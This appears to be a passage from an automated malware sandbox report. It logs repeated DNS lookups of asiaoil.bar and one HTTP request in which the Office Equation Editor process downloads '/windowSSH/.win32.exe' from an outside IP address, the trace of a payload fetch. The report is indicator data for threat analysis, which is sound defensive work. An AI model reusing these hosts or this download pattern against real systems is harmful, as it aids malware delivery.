                    Feb 10, 2022 10:22:56.195903063 CET192.168.2.228.8.8.80xfd14Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:57.314579964 CET192.168.2.228.8.8.80x8b69Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:58.398493052 CET192.168.2.228.8.8.80xe59eStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:59.502744913 CET192.168.2.228.8.8.80x3e6Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:00.513632059 CET192.168.2.228.8.8.80x37b5Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:01.576647043 CET192.168.2.228.8.8.80x92dcStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:02.585699081 CET192.168.2.228.8.8.80xdcc3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:03.632282972 CET192.168.2.228.8.8.80x5c5aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:04.624403954 CET192.168.2.228.8.8.80x314dStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:05.917184114 CET192.168.2.228.8.8.80x18fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:08.555697918 CET192.168.2.228.8.8.80xb372Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:09.629110098 CET192.168.2.228.8.8.80x7447Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:10.670913935 CET192.168.2.228.8.8.80xebcfStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:11.707644939 CET192.168.2.228.8.8.80x56b2Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:12.786386967 CET192.168.2.228.8.8.80x8d8dStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:13.874433041 CET192.168.2.228.8.8.80xdd5aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:14.890866041 CET192.168.2.228.8.8.80xca3fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:16.130302906 CET192.168.2.228.8.8.80xe624Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:17.382666111 CET192.168.2.228.8.8.80xc2e1Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:18.736026049 CET192.168.2.228.8.8.80xb066Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:19.799702883 CET192.168.2.228.8.8.80x3e8aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:20.931313992 CET192.168.2.228.8.8.80x38cfStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:22.033031940 CET192.168.2.228.8.8.80x3dc9Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:23.098339081 CET192.168.2.228.8.8.80x38abStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:25.154160023 CET192.168.2.228.8.8.80xeadStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:26.716438055 CET192.168.2.228.8.8.80xf593Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:27.763015032 CET192.168.2.228.8.8.80x32eeStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:28.759797096 CET192.168.2.228.8.8.80x4a27Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:29.753248930 CET192.168.2.228.8.8.80x7d68Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:30.760308981 CET192.168.2.228.8.8.80x9f6eStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:31.802032948 CET192.168.2.228.8.8.80x3040Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:32.823729992 CET192.168.2.228.8.8.80xd8f9Standard query (0)asiaoil.barA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Feb 10, 2022 10:21:59.679673910 CET8.8.8.8192.168.2.220x9747No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:21:59.679673910 CET8.8.8.8192.168.2.220x9747No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:02.820064068 CET8.8.8.8192.168.2.220x71fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:02.820064068 CET8.8.8.8192.168.2.220x71fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:03.806817055 CET8.8.8.8192.168.2.220xa539No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:03.806817055 CET8.8.8.8192.168.2.220xa539No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:04.893670082 CET8.8.8.8192.168.2.220xa7ceNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:04.893670082 CET8.8.8.8192.168.2.220xa7ceNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:05.933922052 CET8.8.8.8192.168.2.220xe425No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:05.933922052 CET8.8.8.8192.168.2.220xe425No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:06.985570908 CET8.8.8.8192.168.2.220x51a3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:06.985570908 CET8.8.8.8192.168.2.220x51a3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:08.106977940 CET8.8.8.8192.168.2.220x49f3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:08.106977940 CET8.8.8.8192.168.2.220x49f3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:09.252610922 CET8.8.8.8192.168.2.220x2021No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:09.252610922 CET8.8.8.8192.168.2.220x2021No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:10.394609928 CET8.8.8.8192.168.2.220xe478No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:10.394609928 CET8.8.8.8192.168.2.220xe478No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:11.461467028 CET8.8.8.8192.168.2.220xd27fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:11.461467028 CET8.8.8.8192.168.2.220xd27fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:12.531579971 CET8.8.8.8192.168.2.220xa6adNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:12.531579971 CET8.8.8.8192.168.2.220xa6adNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:13.606112957 CET8.8.8.8192.168.2.220x1d7bNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:13.606112957 CET8.8.8.8192.168.2.220x1d7bNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:14.763432026 CET8.8.8.8192.168.2.220xc406No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:14.763432026 CET8.8.8.8192.168.2.220xc406No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:15.859421015 CET8.8.8.8192.168.2.220x45dcNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:15.859421015 CET8.8.8.8192.168.2.220x45dcNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:17.201698065 CET8.8.8.8192.168.2.220xb6dcNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:17.201698065 CET8.8.8.8192.168.2.220xb6dcNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:18.564426899 CET8.8.8.8192.168.2.220xbbf0No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:18.564426899 CET8.8.8.8192.168.2.220xbbf0No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:20.282020092 CET8.8.8.8192.168.2.220x795eNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:20.282020092 CET8.8.8.8192.168.2.220x795eNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:21.349742889 CET8.8.8.8192.168.2.220xeeebNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:21.349742889 CET8.8.8.8192.168.2.220xeeebNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:22.469295979 CET8.8.8.8192.168.2.220xe527No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:22.469295979 CET8.8.8.8192.168.2.220xe527No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:23.484388113 CET8.8.8.8192.168.2.220xfad8No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:23.484388113 CET8.8.8.8192.168.2.220xfad8No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:24.567791939 CET8.8.8.8192.168.2.220xc89cNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:24.567791939 CET8.8.8.8192.168.2.220xc89cNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:25.572346926 CET8.8.8.8192.168.2.220xe031No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:25.572346926 CET8.8.8.8192.168.2.220xe031No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:26.651072025 CET8.8.8.8192.168.2.220x61b1No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:26.651072025 CET8.8.8.8192.168.2.220x61b1No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:27.667135954 CET8.8.8.8192.168.2.220xe5e0No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:27.667135954 CET8.8.8.8192.168.2.220xe5e0No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:29.064960003 CET8.8.8.8192.168.2.220x1048No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:29.064960003 CET8.8.8.8192.168.2.220x1048No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:30.776675940 CET8.8.8.8192.168.2.220x5557No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:30.776675940 CET8.8.8.8192.168.2.220x5557No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:31.858690977 CET8.8.8.8192.168.2.220x74efNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:31.858690977 CET8.8.8.8192.168.2.220x74efNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:32.930648088 CET8.8.8.8192.168.2.220x14c8No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:32.930648088 CET8.8.8.8192.168.2.220x14c8No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:33.985292912 CET8.8.8.8192.168.2.220x860fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:33.985292912 CET8.8.8.8192.168.2.220x860fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:35.035057068 CET8.8.8.8192.168.2.220xfea3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:35.035057068 CET8.8.8.8192.168.2.220xfea3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:36.052189112 CET8.8.8.8192.168.2.220x2516No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:36.052189112 CET8.8.8.8192.168.2.220x2516No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:37.097563982 CET8.8.8.8192.168.2.220xff8aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:37.097563982 CET8.8.8.8192.168.2.220xff8aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:38.148770094 CET8.8.8.8192.168.2.220x7ac5No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:38.148770094 CET8.8.8.8192.168.2.220x7ac5No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:39.203105927 CET8.8.8.8192.168.2.220xb649No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:39.203105927 CET8.8.8.8192.168.2.220xb649No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:40.399499893 CET8.8.8.8192.168.2.220x55b7No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:40.399499893 CET8.8.8.8192.168.2.220x55b7No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:41.416198015 CET8.8.8.8192.168.2.220x9913No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:41.416198015 CET8.8.8.8192.168.2.220x9913No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:42.509901047 CET8.8.8.8192.168.2.220xd5cfNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:42.509901047 CET8.8.8.8192.168.2.220xd5cfNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:43.524178982 CET8.8.8.8192.168.2.220xe474No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:43.524178982 CET8.8.8.8192.168.2.220xe474No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:44.563961983 CET8.8.8.8192.168.2.220xd627No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:44.563961983 CET8.8.8.8192.168.2.220xd627No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:45.620157957 CET8.8.8.8192.168.2.220xffb2No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:45.620157957 CET8.8.8.8192.168.2.220xffb2No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:46.698565960 CET8.8.8.8192.168.2.220x24d3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:46.698565960 CET8.8.8.8192.168.2.220x24d3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:47.712665081 CET8.8.8.8192.168.2.220x664bNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:47.712665081 CET8.8.8.8192.168.2.220x664bNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:48.813474894 CET8.8.8.8192.168.2.220xc7a4No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:48.813474894 CET8.8.8.8192.168.2.220xc7a4No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:49.878983974 CET8.8.8.8192.168.2.220x3468No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:49.878983974 CET8.8.8.8192.168.2.220x3468No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:51.019309044 CET8.8.8.8192.168.2.220xfa95No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:51.019309044 CET8.8.8.8192.168.2.220xfa95No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:52.041841030 CET8.8.8.8192.168.2.220xd853No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:52.041841030 CET8.8.8.8192.168.2.220xd853No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:53.123905897 CET8.8.8.8192.168.2.220xc5beNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:53.123905897 CET8.8.8.8192.168.2.220xc5beNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:54.186261892 CET8.8.8.8192.168.2.220x412aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:54.186261892 CET8.8.8.8192.168.2.220x412aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:55.202280998 CET8.8.8.8192.168.2.220x6266No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:55.202280998 CET8.8.8.8192.168.2.220x6266No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:56.214804888 CET8.8.8.8192.168.2.220xfd14No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:56.214804888 CET8.8.8.8192.168.2.220xfd14No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:57.333787918 CET8.8.8.8192.168.2.220x8b69No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:57.333787918 CET8.8.8.8192.168.2.220x8b69No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:58.417352915 CET8.8.8.8192.168.2.220xe59eNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:58.417352915 CET8.8.8.8192.168.2.220xe59eNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:59.519994974 CET8.8.8.8192.168.2.220x3e6No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:59.519994974 CET8.8.8.8192.168.2.220x3e6No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:00.533606052 CET8.8.8.8192.168.2.220x37b5No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:00.533606052 CET8.8.8.8192.168.2.220x37b5No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:01.595443010 CET8.8.8.8192.168.2.220x92dcNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:01.595443010 CET8.8.8.8192.168.2.220x92dcNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:02.604903936 CET8.8.8.8192.168.2.220xdcc3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:02.604903936 CET8.8.8.8192.168.2.220xdcc3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:03.649529934 CET8.8.8.8192.168.2.220x5c5aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:03.649529934 CET8.8.8.8192.168.2.220x5c5aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:04.640897036 CET8.8.8.8192.168.2.220x314dNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:04.640897036 CET8.8.8.8192.168.2.220x314dNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:05.934077978 CET8.8.8.8192.168.2.220x18fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:05.934077978 CET8.8.8.8192.168.2.220x18fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:08.573890924 CET8.8.8.8192.168.2.220xb372No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:08.573890924 CET8.8.8.8192.168.2.220xb372No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:09.647778988 CET8.8.8.8192.168.2.220x7447No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:09.647778988 CET8.8.8.8192.168.2.220x7447No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:10.689938068 CET8.8.8.8192.168.2.220xebcfNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:10.689938068 CET8.8.8.8192.168.2.220xebcfNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:11.726572037 CET8.8.8.8192.168.2.220x56b2No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:11.726572037 CET8.8.8.8192.168.2.220x56b2No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:12.805661917 CET8.8.8.8192.168.2.220x8d8dNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:12.805661917 CET8.8.8.8192.168.2.220x8d8dNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:13.894022942 CET8.8.8.8192.168.2.220xdd5aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:13.894022942 CET8.8.8.8192.168.2.220xdd5aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:14.907351017 CET8.8.8.8192.168.2.220xca3fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:14.907351017 CET8.8.8.8192.168.2.220xca3fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:16.148524046 CET8.8.8.8192.168.2.220xe624No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:16.148524046 CET8.8.8.8192.168.2.220xe624No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:17.401235104 CET8.8.8.8192.168.2.220xc2e1No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:17.401235104 CET8.8.8.8192.168.2.220xc2e1No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:18.763688087 CET8.8.8.8192.168.2.220xb066No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:18.763688087 CET8.8.8.8192.168.2.220xb066No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:19.818831921 CET8.8.8.8192.168.2.220x3e8aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:19.818831921 CET8.8.8.8192.168.2.220x3e8aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:20.950112104 CET8.8.8.8192.168.2.220x38cfNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:20.950112104 CET8.8.8.8192.168.2.220x38cfNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:22.051954985 CET8.8.8.8192.168.2.220x3dc9No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:22.051954985 CET8.8.8.8192.168.2.220x3dc9No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:23.115072966 CET8.8.8.8192.168.2.220x38abNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:23.115072966 CET8.8.8.8192.168.2.220x38abNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:25.172872066 CET8.8.8.8192.168.2.220xeadNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:25.172872066 CET8.8.8.8192.168.2.220xeadNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:26.735743999 CET8.8.8.8192.168.2.220xf593No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:26.735743999 CET8.8.8.8192.168.2.220xf593No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:27.781708956 CET8.8.8.8192.168.2.220x32eeNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:27.781708956 CET8.8.8.8192.168.2.220x32eeNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:28.778294086 CET8.8.8.8192.168.2.220x4a27No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:28.778294086 CET8.8.8.8192.168.2.220x4a27No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:29.769979954 CET8.8.8.8192.168.2.220x7d68No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:29.769979954 CET8.8.8.8192.168.2.220x7d68No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:30.778796911 CET8.8.8.8192.168.2.220x9f6eNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:30.778796911 CET8.8.8.8192.168.2.220x9f6eNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:31.820941925 CET8.8.8.8192.168.2.220x3040No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:31.820941925 CET8.8.8.8192.168.2.220x3040No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:32.840801001 CET8.8.8.8192.168.2.220xd8f9No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:32.840801001 CET8.8.8.8192.168.2.220xd8f9No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • 198.46.132.195
                    • asiaoil.bar

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249165198.46.132.19580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampkBytes transferredDirectionData
                    Feb 10, 2022 10:21:50.261872053 CET0OUTGET /windowSSH/.win32.exe HTTP/1.1
